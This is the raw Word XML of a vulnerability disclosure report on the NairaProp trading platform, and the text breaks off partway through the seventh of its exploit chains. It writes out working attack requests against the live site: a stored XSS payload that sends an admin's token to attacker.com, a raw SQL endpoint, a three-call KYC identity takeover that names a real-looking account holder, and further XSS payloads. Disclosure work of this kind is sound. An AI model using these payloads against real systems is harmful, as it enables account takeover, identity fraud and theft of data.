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Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>VULNERABILITY DISCLOSURE REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>NairaProp Proprietary Trading Platform</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4320"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>www.nairaprop.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>External Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>naireduu.com.ng (Vercel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>elite-prop-master-production.up.railway.app (Railway)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>29 June 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CONFIDENTIAL — Vulnerability Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>54 Findings | 9 Proven Exploit Chains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>NairaProp, a Nigerian proprietary trading platform handling real financial transactions, contains critical vulnerabilities enabling full database compromise, identity theft at scale, and direct financial fraud. This report documents 54 findings across 8 severity categories with 9 proven exploit chains that demonstrate end-to-end attack paths from unauthenticated user to full system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The most critical finding is a KYC Identity Theft chain that allows any registered user to assume ANY Nigerian citizen's verified banking identity in exactly 2 API calls with zero human review. Combined with Stored XSS vulnerabilities (7+ variants in production DB), mass PII enumeration (no rate limiting), and an unauthenticated external payment gateway, the platform enables full identity fraud, admin account takeover, and direct financial theft.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Severity Distribution</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Key Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>🔴 CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>DB compromise, identity theft, financial fraud, admin takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>🟠 HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>PII exposure, auth bypass, payment fraud, info disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>🟡 MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Blind injection, cooldown bypass, error leaking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>🔵 LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Minor info leaks, logging gaps, UUID disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>9 proven end-to-end exploit chains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Proven Exploit Chains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CHAIN 1: Stored XSS → Admin Token Theft → Full DB R/W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CVSS: 10.0 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)  |  Status: ✅ PROVEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Any user can inject stored XSS payloads via the manual payment request endpoint (`POST /api/payments/manual-request`) or gateway checkout endpoint. The `fullName` field stores raw HTML/JSX verbatim with zero sanitization. The frontend renders this field using `dangerouslySetInnerHTML` with NO Content-Security-Policy headers. When an admin views the manual payment queue or order details, the XSS fires in their browser, stealing their JWT from `localStorage("authToken")`. The stolen admin JWT grants access to a raw SQL execution endpoint (`/admin/dev/sql/run`) enabling full database read/write.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Step 1: Inject XSS via manual payment</w:t>
        <w:br/>
        <w:t>POST /api/payments/manual-request</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "fullName": "&lt;img src=x onerror=\"fetch('https://attacker.com/?t='+localStorage.authToken)\"&gt;",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "email": "attacker@gmail.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "reference": "XSS_ORDER",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "proof": "https://example.com/proof.png",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "challengeType": "50k",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "ddType": "standard",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "amount": 4000</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true, "order":{"id":"9ec220...","reference":"MP_MQYRBLLP_44BD1A6C"}}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Step 2: Admin views manual payment dashboard → XSS fires → JWT exfiltrated</w:t>
        <w:br/>
        <w:br/>
        <w:t>Step 3: Attacker uses stolen admin JWT</w:t>
        <w:br/>
        <w:t>POST /api/admin/dev/sql/run</w:t>
        <w:br/>
        <w:t>Authorization: Bearer &lt;stolen_admin_jwt&gt;</w:t>
        <w:br/>
        <w:t>{"query": "SELECT * FROM users"}</w:t>
        <w:br/>
        <w:t>→ Full database read/write access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Root Causes: (1) No input sanitization on fullName, (2) dangerouslySetInnerHTML rendering, (3) No Content-Security-Policy headers, (4) JWT in localStorage (accessible to any XSS), (5) Raw SQL execution endpoint in production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CHAIN 2: KYC Identity Theft → Verified Fraud Account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CVSS: 9.8  |  Status: ✅ FULLY PROVEN END-TO-END</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Any registered user can assume ANY Nigerian citizen's verified banking identity in exactly 2 API calls with zero human review. The `change-name` endpoint auto-approves name changes to match any bank account holder's legal name. The `confirm` endpoint auto-approves KYC verification when the name matches. Both steps are fully automated with no admin review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Step 1: Enumerate target identity (no rate limit)</w:t>
        <w:br/>
        <w:t>POST /api/kyc-verify/resolve</w:t>
        <w:br/>
        <w:t>{"bank_code": "058", "account_number": "0000000000"}</w:t>
        <w:br/>
        <w:t>→ 200 {"account_name": "OYEWOLE OLUBUSOLA OLUWAKEMI", "bank_name": "GTBank Plc"}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Step 2: Steal identity (auto-approved)</w:t>
        <w:br/>
        <w:t>POST /api/kyc-verify/change-name</w:t>
        <w:br/>
        <w:t>{"bank_code": "058", "account_number": "0000000000"}</w:t>
        <w:br/>
        <w:t>→ 200 {"success": true, "outcome": "auto_approved",</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "new_name": "OYEWOLE OLUBUSOLA OLUWAKEMI"}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Step 3: Verify as stolen identity (auto-approved)</w:t>
        <w:br/>
        <w:t>POST /api/kyc-verify/confirm</w:t>
        <w:br/>
        <w:t>{"bank_code": "058", "account_number": "0000000000"}</w:t>
        <w:br/>
        <w:t>→ 200 {"success": true, "verified": true, "decision": "auto_approve",</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "match": {"score": 100}}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Verification:</w:t>
        <w:br/>
        <w:t>GET /api/kyc/verification-status</w:t>
        <w:br/>
        <w:t>→ {"kycVerified": true, "bankDetails": {"account_name": "OYEWOLE..."}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Impact: Full identity fraud at scale. Any user can enumerate bank account numbers (no rate limiting on resolve/detect-bank), steal identities, pass KYC verification, and create fully verified fraud accounts for money laundering or payout redirection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CHAIN 3: Manual Payment Fraud → Free Funded Accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  Status: ✅ PROVEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Any user can submit fake payment proof via the manual payment endpoint. The server accepts any URL string as "proof" — including URLs pointing to fake receipts, internal network addresses (SSRF via admin browser), or even XSS payloads. The order appears in the admin manual payments queue for approval. There is no automated verification that payment was actually made. An admin clicks "Approve" and the account is funded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "fullName": "Attacker",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "email": "attacker@gmail.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "reference": "FAKE_REF_123",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "proof": "https://i.imgur.com/FAKEreceipt.png",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "challengeType": "50k",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "ddType": "standard",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "amount": 4000</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true, "order":{"id":"9ec220...","status":"manual_pending"}}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Admin approves → Account funded without any actual payment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CHAIN 4: External Payment Gateway → Unauthenticated Checkout Sessions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  Status: ✅ PROVEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST https://naireduu.com.ng/api/checkout</w:t>
        <w:br/>
        <w:t>{"source":"nairaprop","programId":"50k","fullName":"Test","email":"t@t.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve"> "phone":"080","state":"Lagos","dd_type":"standard","variant":"two_phase"}</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "checkout_url":"https://pay.squadco.com/NE_MQYTGOU6_E1FF3BF1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "reference":"NE_MQYTGOU6_E1FF3BF1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "callback_url":"https://elite-prop-master-production.up.railway.app/...",</w:t>
        <w:br/>
        <w:t xml:space="preserve">       "inline":{"public_key":"pk_ebf366ed1f39584c5db717fbc64cd543fb18b0f7",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                 "amount":400000,...}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The external payment gateway has NO authentication. Anyone can create real Squad checkout sessions. The gateway leaks the Squad public key, the real Railway backend URL, and creates order IDs that are NOT tracked on NairaProp (ghost orders). While the server does compute the correct price server-side, the unauthenticated nature allows spam, order flooding, and combined fraud with CHAIN 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CHAIN 5: Complete Admin Info Disclosure → Targeted Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  Status: ✅ PROVEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Admin JS bundles are publicly accessible and reveal 94+ admin API endpoints with exact role requirements. Error messages leak the complete role hierarchy. User search endpoint exposes full admin PII. Combined with other chains, this enables targeted spear-phishing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CHAIN 6: Affiliate Auto-Registration → Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  Status: ✅ PROVEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Any user can auto-register as an affiliate with 15% commission via an unauthenticated endpoint. The affiliate link system allows stored XSS through two attack vectors: (1) `javascript:` URI scheme in destination_url, and (2) attribute injection to break out of HTML attributes. Both are stored verbatim with no sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Step 1: Auto-register as affiliate</w:t>
        <w:br/>
        <w:t>POST /api/affiliate/user-affiliate/register</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true,"affiliate":{"commission":"15%","code":"user50fd"}}</w:t>
        <w:br/>
        <w:br/>
        <w:t>Step 2: Store XSS payload via affiliate link</w:t>
        <w:br/>
        <w:t>POST /api/affiliate/links</w:t>
        <w:br/>
        <w:t>{"name":"XSS Link","destination_url":"javascript:alert(1)"}</w:t>
        <w:br/>
        <w:t>→ 200 (stored verbatim)</w:t>
        <w:br/>
        <w:br/>
        <w:t>Step 3: Attribute injection variant</w:t>
        <w:br/>
        <w:t>POST /api/affiliate/links</w:t>
        <w:br/>
        <w:t>{"name":"Link","destination_url":"https://nairaprop.com/?ref=x\"&gt;&lt;img src=x onerror=alert(1)&gt;"}</w:t>
        <w:br/>
        <w:t>→ 200 (attribute breakout, DOM XSS when link is rendered)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CHAIN 7: Mass Assignment → Profile Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE-915  |  Status: ✅ PROVEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
